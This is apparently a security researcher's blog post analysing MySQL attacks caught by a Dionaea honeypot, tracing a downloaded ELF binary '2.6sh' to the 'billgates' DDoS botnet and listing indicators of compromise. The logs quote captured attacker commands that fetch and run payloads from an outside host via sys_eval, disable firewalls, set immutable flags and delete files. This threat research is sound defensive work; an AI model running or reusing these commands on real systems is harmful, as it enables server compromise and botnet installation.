Spare time with "2.6sh"

"I'm live!" I decided to publish a small post out of spare time, related to gathering indicators of compromises based on collected data from my honeypot. I was going to do a small project with my Raspberry Pi but it seems to have been misplaced... but i'll save that tidbit for later.

Today I will do a quick pass over on a binary called "2.6sh," but before I can do that one question should be asked, "How did you come across this sample?" Glad you asked...let's get started.

How did you come across this sample?

Currently, I run a honeypot called Dionaea, which is located on a machine out in the deep dark internet. Dionaea's main purpose is to expose emulated vulnerable services to attackers in hopes to obtain original malicious malware copies which maybe exploiting other systems in the wild. Some of the services emulated by Dionaea are MSSQL, MySQL, SIP, SSH, SMB, FTP, HTTP and so on. This is not the only tool I use for monitoring malicious acts. Another service which simply monitors the network is called Bro NSM or simply called "Bro." This is an extremely awesome framework that gives you in-depth analysis into your network traffic. If you have not heard of or given Bro a chance, I highly recommend you try it out. Now that I have gotten that out of the way, you are probably saying could you please get on with the finding and analysis :).

The Finding

Looking at logs, I had notice there were some MYSQL connection to the honeypot, so of course I pulled Bro and Dionaea logs. Given the large amount of noise seen on the internet for MySQL I knew I had to quickly narrow down the fun artifacts, so I decided to pull the Dionaea logs first. This will not only give brute forcing logs (username,password combos) but MySQL commands with arguments and a time frame of execution of those events. One artifact that stuck out on the initial gleaning of the logs was a attempted file download name "2.6sh" from a remote IP address.

Pulling from the mysql_command_args table in Dionaea's SQLite database, for a "2.6sh" search reveals the following:

Search for "2.6sh"

sqlite> .schema mysql_command_args  
    CREATE TABLE mysql_command_args (
                mysql_command_arg INTEGER PRIMARY KEY,
                mysql_command INTEGER,
                mysql_command_arg_index NUMBER NOT NULL,
                mysql_command_arg_data TEXT NOT NULL
                -- CONSTRAINT mysql_commands_connection_fkey FOREIGN KEY (connection) REFERENCES connections (connection)
            );

sqlite> select * from mysql_command_args where     mysql_command_arg_data like '%2.6sh%';  
25804|43428|0|select sys_eval("wgethttp://222.186.15.135:7788/2.6sh;chmod 0755 2.6sh;./2.6sh;")  
25805|43429|0|select sys_eval("chmod 777 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;")  
25806|43430|0|select sys_eval("chmod 0777 2.6sh;chmod u+x 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;chattr +i 2.6sh;")  
25826|43451|0|select sys_eval("wget http://222.186.15.135:7788/2.6sh;chmod 0755 2.6sh;./2.6sh;")  
25827|43452|0|select sys_eval("chmod 777 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;")  
25828|43453|0|select sys_eval("chmod 0777 2.6sh;chmod u+x 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;chattr +i 2.6sh;")  
26320|44439|0|select sys_eval("wget http://222.186.15.135:7788/2.6sh;chmod 0755 2.6sh;./2.6sh;")  
26321|44440|0|select sys_eval("chmod 777 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;")  
26322|44441|0|select sys_eval("chmod 0777 2.6sh;chmod u+x 2.6sh;./2.6sh;chmod u+x 2.6sh;./2.6sh;chattr +i 2.6sh;")  

With this newly discovered information, we can now dive a bit deeper in our data set to see what else has been captured in Dionaea. Lets start by looking for that IP address in the connections and mysql_command_args table.

Malicious IP Connections

sqlite> .schema connections  
    CREATE TABLE connections    (
                connection INTEGER PRIMARY KEY,
                connection_type TEXT,
                connection_transport TEXT,
                connection_protocol TEXT,
                connection_timestamp INTEGER,
                connection_root INTEGER,
                connection_parent INTEGER,
                local_host TEXT,
                local_port INTEGER,
                remote_host TEXT,
                remote_hostname TEXT,
                remote_port INTEGER
            );

sqlite> select * from connections where remote_host = '222.186.15.135';  
431890|accept|tcp|mysqld|1442151157.86037|431890||96.126.122.224|3306|222.186.15.135||1186  
431892|accept|tcp|mysqld|1442151159.6204|431892||96.126.122.224|3306|222.186.15.135||1310  
451981|accept|tcp|mysqld|1442781286.83636|451981||96.126.122.224|3306|222.186.15.135||3502  
451983|accept|tcp|mysqld|1442781417.54318|451983||96.126.122.224|3306|222.186.15.135||3835  
452249|accept|tcp|mysqld|1442791680.71157|452249||96.126.122.224|3306|222.186.15.135||2158  
452251|accept|tcp|mysqld|1442791688.01481|452251||96.126.122.224|3306|222.186.15.135||2412  
500827|accept|tcp|mysqld|1444237762.53936|500827||96.126.122.224|3306|222.186.15.135||4617  
500829|accept|tcp|mysqld|1444237769.40262|500829||96.126.122.224|3306|222.186.15.135||1886  

Looking at the output from the connections table, we can narrow it down to timeframes related to these events. From the timeframe, we can then pull Bro logs to determine if there were any other related traffic besides MySQL. I created a quick epochtime_convert.py python script to speed up analysis.

Timeframe from Connections

#!/usr/bin/env python
import argparse  
import time

parser = argparse.ArgumentParser(description='Converts Epoch Time to localtime')

parser.add_argument('epochtime', type=float, nargs='+', help='Example: 1444237762.53936')  
args = parser.parse_args()

for epoch in args.epochtime:  
    print(time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(float(epoch))))
python epochtime_convert.py 1442151157.86037 1442151159.6204 1442781286.83636 1442781417.54318 1442791680.71157 1442791688.01481 1444237762.53936 1444237769.40262  
2015-09-13 06:32:37  
2015-09-13 06:32:39  
2015-09-20 13:34:46  
2015-09-20 13:36:57  
2015-09-20 16:28:00  
2015-09-20 16:28:08  
2015-10-07 10:09:22  
2015-10-07 10:09:29  

Malicious IP MYSQL CMDS

sqlite> select * from mysql_command_args where mysql_command_arg_data like '%222.186.15.135%';  
25061|42230|0|select sys_eval("wget http://222.186.15.135:358/lymm;chmod 777 lymm;./lymm;chmod +i lymm;")  
25062|42231|0|select sys_eval("wget http://222.186.15.135:358/lymm;chmod 777 lymm;./lymm;")  
25410|42897|0|select sys_eval("wget http://222.186.15.135:358/lymm;chmod 777 lymm;./lymm;chmod +i lymm;")  
25411|42898|0|select sys_eval("wget http://222.186.15.135:358/lymm;chmod 777 lymm;./lymm;")  
25412|42899|0|system wget http://222.186.15.135:358/lymm  
25415|42902|0|select sys_eval("/etc/init.d/iptables stop;service iptables stop;SuSEfirewall2 stop;reSuSEfirewall2 stop;wget -c http://222.186.15.135:358/lymm;chmod 777 lymm;./lymm;")  
25416|42903|0|select sys_eval("wget -O /tmp/lymm http://222.186.15.135:358/lymm;chmod 0755 /lymm;nohup /tmp/lymm > /dev/null 2>&1 &;")  
25417|42904|0|select sys_eval("rm *;curl -o /tmp/rotini http://222.186.15.135:358/lymm;wget -c http://222.186.15.135:358/lymm;chmod 777 /tmp/./lymm;/tmp/./lymm;rm /tmp/*;")  
25537|43124|0|system wget http://222.186.15.135:358/keeplive  
25576|43165|0|system wget http://222.186.15.135:358/keeplive  
25615|43206|0|system wget http://222.186.15.135:358/keeplive  
25804|43428|0|select sys_eval("wget http://222.186.15.135:7788/2.6sh;chmod 0755 2.6sh;./2.6sh;")  
25826|43451|0|select sys_eval("wget http://222.186.15.135:7788/2.6sh;chmod 0755 2.6sh;./2.6sh;")  
26320|44439|0|select sys_eval("wget http://222.186.15.135:7788/2.6sh;chmod 0755 2.6sh;./2.6sh;")  

After getting a view of what the honeypot caught, I decided to go forth and pull down the "2.6sh" artifact to do some reverse engineering (RE) of the executable.

File Information

$ file 2.6sh
2.6sh: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.2.5, not stripped  

Of course now "2.6sh" might make sense, seeing that this binary is an ELF, it might also be targeting systems with 2.6.x kernels. Not only may it be attacking that particular kernel but it attempts to trick the user into believing it was a BASH shell script being downloaded and executed. This of course is all speculation until you actually do some static analysis.

Static to IOCs

Loading this binary into IDA PRO you almost immediately notice the binary was not packed and has function names intact. Looking at the strings view, you notice several artifacts which indicate a DDoS style bot.

<--snip-->  
.rodata:080F18FC 0000000E C 11CAttackBase
.rodata:080F190A 00000010 C 13CPacketAttack
.rodata:080F1928 0000000D C 10CAttackUdp
.rodata:080F1944 0000000D C 10CAttackSyn
.rodata:080F1960 0000000E C 11CAttackIcmp
.rodata:080F197C 0000000D C 10CAttackDns
.rodata:080F1998 0000000D C 10CAttackAmp
.rodata:080F19B4 0000000D C 10CAttackPrx
.rodata:080F19D0 00000012 C 15CAttackCompress
.rodata:080F19F0 0000000D C 10CTcpAttack
.rodata:080F1A0C 0000000B C 9CAttackCc
.rodata:080F1A24 0000000B C 9CAttackIe
.rodata:080F1D0C 00000009 C 7CSerial
<--snip-->  

Along with the attack commands, you can also glean several IP addresses, update commands, user-agent strings, and possible file names. Typically I would continue to dive deeper and do some RE, but I want to gather quick indicators of compromise (IOCs) before diving into anything that might peak my interest. This will help with some pre-research, so that time is not spent looking into something that might have already been discovered. Continuing through the string view, I researched some artifacts and found that this binary is assoicated to a botnet called "billgates". More information can be found @ https://securelist.com/analysis/publications/64361/versatile-ddos-trojan-for-linux/ and the original source http://habrahabr.ru/post/213973/.

Conclusion and IOCs

Given there is enough data out there related to this particular botnet (not this particular variant) there is no need for me to RE the binary any further. With that said enjoy the list of IOCs for further research.

Hashes

c074a4c2ca44c50aa5d20fb5a4d4a11b  
385fe7a6089a4668c3cb69a38ff7f1d934000b227a6c85ba6e6bd44c02c5b350  

Files

/home/monitor/Gates
/usr/lib/xpacket.ko
/usr/lib/libamplify.so
/usr/bin/.sshd
/tmp/moni.lock
/tmp/bill.lock
/tmp/notify.file
/etc/conf.n
/etc/cmd.n
/etc/rc*.d/97DbSecuritySpt

User-Agent

"Mozilla/5.0 (|S|) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/|D&23&25|.|D&0&9|.|D&1000&9000|.|D&10&99| Safari/537.17"
"Mozilla/5.0 (|S|; rv:18.0) Gecko/20100101 Firefox/18.0"
"Opera/|D&7&9|.|D&70&90| (|S|) Presto/2.|D&8&18|.|D&90&890| Version/|D&11&12|.|D&10&19|"

IP addresses

61.132.163.68  
202.102.192.68  
202.102.213.68  
202.102.200.101  
58.242.2.2  
202.38.64.1  
211.91.88.129  
211.138.180.2  
218.104.78.2  
202.102.199.68  
202.175.3.3  
202.175.3.8  
202.112.144.30  
61.233.9.9  
61.233.9.61  
124.207.160.110  
202.97.7.6  
202.97.7.17  
202.106.0.20  
202.106.46.151  
202.106.195.68  
202.106.196.115  
02.106.196.212  
202.106.196.228  
202.106.196.230  
202.106.196.232  
202.106.196.237  
202.112.112.10  
211.136.17.107  
211.136.28.231  
211.136.28.234  
211.136.28.237  
211.147.6.3  
219.141.136.10  
219.141.140.10  
219.141.148.37  
219.141.148.39  
219.239.26.42  
221.130.32.100  
221.130.32.103  
221.130.32.106  
221.130.32.109  
221.130.33.52  
221.130.33.60  
221.176.3.70  
221.176.3.73  
221.176.3.76  
221.176.3.79  
221.176.3.83  
221.176.3.85  
221.176.4.6  
221.176.4.9  
221.176.4.12  
221.176.4.15  
221.176.4.18  
221.176.4.21  
58.22.96.66  
218.104.128.106  
202.101.98.55  
211.138.145.194  
211.138.151.161  
211.138.156.66  
218.85.152.99  
218.85.157.99  
222.47.29.93  
202.101.107.85  
119.233.255.228  
222.47.62.142  
122.72.33.240  
211.98.121.27  
218.203.160.194  
221.7.34.10  
61.235.70.98  
113.111.211.22  
202.96.128.68  
202.96.128.86  
202.96.128.166  
210.21.3.140  
210.21.4.130  
211.95.193.97  
211.98.2.4  
211.98.4.1  
211.162.61.225  
211.162.61.235  
211.162.61.255  
211.162.62.1  
211.162.62.60  
221.4.66.66  
202.103.176.22  
202.96.144.47  
210.38.192.33  
202.96.134.33  
202.96.134.133  
202.96.154.15  
210.21.196.6  
221.5.88.88  
202.103.243.112  
202.193.64.33  
61.235.164.13  
61.235.164.18  
202.103.225.68  
221.7.136.68  
202.103.224.68  
211.97.64.129  
211.138.240.100  
211.138.242.18  
211.138.245.180  
221.7.128.68  
222.52.118.162  
202.98.192.67  
202.98.198.167  
211.92.136.81  
211.139.1.3  
211.139.2.18  
202.100.192.68  
211.97.96.65  
211.138.164.6  
221.11.132.2  
202.100.199.8  
202.99.160.68  
202.99.166.4  
202.99.168.8  
222.222.222.222  
202.102.224.68  
202.102.227.68  
222.85.85.85  
222.88.88.88  
210.42.241.1  
202.196.64.1  
112.100.100.100  
02.97.224.68  
219.235.127.1  
61.236.93.33  
211.93.24.129  
211.137.241.34  
219.147.198.230  
202.103.0.68  
202.103.0.117  
202.103.24.68  
202.103.44.150  
202.114.0.242  
202.114.240.6  
211.161.158.11  
211.161.159.3  
218.104.111.114  
218.104.111.122  
218.106.127.114  
218.106.127.122  
221.232.129.30  
59.51.78.210  
61.234.254.5  
202.103.96.112  
219.72.225.253  
222.243.129.81  
222.246.129.80  
211.142.210.98  
211.142.210.100  
220.168.208.3  
220.168.208.6  
220.170.64.68  
218.76.192.100  
61.187.98.3  
61.187.98.6  
202.98.0.68  
211.93.64.129  
211.141.16.99  
202.98.5.68  
219.149.194.55  
211.138.200.69  
202.102.3.141  
202.102.3.144  
58.240.57.33  
112.4.0.55  
114.114.114.114  
114.114.115.115  
202.102.24.34  
218.2.135.1  
221.6.4.66  
221.131.143.69  
202.102.8.141  
222.45.0.110  
61.177.7.1  
218.104.32.106  
211.103.13.101  
221.228.255.1  
61.147.37.1  
222.45.1.40  
58.241.208.46  
202.102.9.141  
202.102.7.90  
202.101.224.68  
202.101.226.68  
211.141.90.68  
211.137.32.178  
202.96.69.38  
211.140.197.58  
219.149.6.99  
202.96.86.18  
101.47.189.10  
101.47.189.18  
118.29.249.50  
118.29.249.54  
202.96.64.68  
202.96.75.68  
202.118.1.29  
202.118.1.53  
219.148.204.66  
202.99.224.8  
202.99.224.67  
211.90.72.65  
211.138.91.1  
218.203.101.3  
202.100.96.68  
211.93.0.81  
222.75.152.129  
211.138.75.123  
202.102.154.3  
202.102.152.3  
219.146.1.66  
219.147.1.66  
202.102.128.68  
202.102.134.68  
211.138.106.19  
211.90.80.65  
202.99.192.66  
202.99.192.68  
61.134.1.4  
202.117.96.5  
202.117.96.10  
218.30.19.40  
218.30.19.50  
116.228.111.118  
180.168.255.18  
202.96.209.5  
202.96.209.133  
202.101.6.2  
211.95.1.97  
211.95.72.1  
211.136.112.50  
211.136.150.66  
119.6.6.6  
124.161.97.234  
124.161.97.238  
124.161.97.242  
61.139.2.69  
202.98.96.68  
202.115.32.36  
202.115.32.39  
218.6.200.139  
218.89.0.124  
61.139.54.66  
61.139.39.73  
139.175.10.20  
139.175.55.244  
139.175.150.20  
139.175.252.16  
168.95.1.1  
210.200.211.193  
210.200.211.225  
211.78.130.1  
61.31.1.1  
61.31.233.1  
168.95.192.1  
168.95.192.174  
61.60.224.3  
61.60.224.5  
202.113.16.10  
202.113.16.11  
202.99.96.68  
202.99.104.68  
211.137.160.5  
211.137.160.185  
219.150.32.132  
202.98.224.68  
211.139.73.34  
61.10.0.130  
61.10.1.130  
202.14.67.4  
202.14.67.14  
202.45.84.58  
202.45.84.67  
202.60.252.8  
202.85.128.32  
203.80.96.9  
203.142.100.18  
203.142.100.21  
203.186.94.20  
203.186.94.241  
221.7.1.20  
61.128.114.133  
61.128.114.166  
218.202.152.130  
61.166.150.123  
202.203.128.33  
211.98.72.7  
211.139.29.68  
211.139.29.150  
211.139.29.170  
221.3.131.11  
222.172.200.68  
61.166.150.101  
61.166.150.139  
202.203.144.33  
202.203.160.33  
202.203.192.33  
202.203.208.33  
202.203.224.33  
211.92.144.161  
222.221.5.240  
61.166.25.129  
202.96.103.36  
221.12.1.227  
221.130.252.200  
222.46.120.5  
202.96.96.68  
218.108.248.219  
218.108.248.245  
61.130.254.34  
60.191.244.5  
202.96.104.15  
202.96.104.26  
221.12.33.227  
202.96.107.27  
61.128.128.68  
61.128.192.68  
218.201.17.2  
221.5.203.86  
221.5.203.90  
221.5.203.98  
221.7.92.86  
221.7.92.98  

3rd Party lookups based on initial network connection

Only results that were found was the IP address of the initial event, but it did not contain the above IOCs. No results were found on VXshare. Although this binary hasn't been "found" as of yet, this does not mean there is not a variant that already exist and has been reported.

https://www.virustotal.com/nl/ip-address/222.186.15.135/information/
https://www.robtex.com/r/222.186.15.135:.html
https://urlquery.net/search.php?q=222.186.15.135&type=string&start=2011-06-25&end=2015-10-11&max=50